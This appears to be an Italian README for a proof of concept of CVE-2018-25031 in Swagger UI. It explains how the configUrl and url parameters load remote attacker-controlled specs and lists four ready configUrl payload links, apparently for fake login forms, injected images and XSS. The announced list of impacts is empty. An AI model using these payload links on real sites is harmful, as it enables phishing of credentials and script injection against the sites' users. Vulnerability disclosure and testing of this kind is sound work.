
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI è una libreria ampiamente utilizzata che rende le specifiche OpenAPI (precedentemente Swagger) in un'interfaccia web interattiva. Consente a sviluppatori e integratori di esplorare e testare le API senza avere l'implementazione backend in atto.
La vulnerabilità deriva da una validazione insufficiente dei parametri di query URL utilizzati per caricare file di configurazione o specifiche remoti dal client Swagger UI. I parametri comuni coinvolti sono:
?url=.yaml?configUrl=.jsonUn attaccante può puntare questi parametri verso una definizione OpenAPI o un file di configurazione controllato dall'attaccante e ospitato in remoto, che potrebbe essere renderizzato da un'istanza vulnerabile.
Il caricamento di un file remoto malevolo può abilitare diversi esiti di alto impatto in base alla configurazione di hosting e alle salvaguardie in atto:
Riferimenti:
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
Il contenuto di questo repository è fornito solo a scopo educativo e informativo. L'autore non è responsabile per qualsiasi uso improprio. Assicurati di avere la debita autorizzazione prima dell'uso, agisci in modo responsabile a tuo rischio e segui tutte le linee guida legali ed etiche.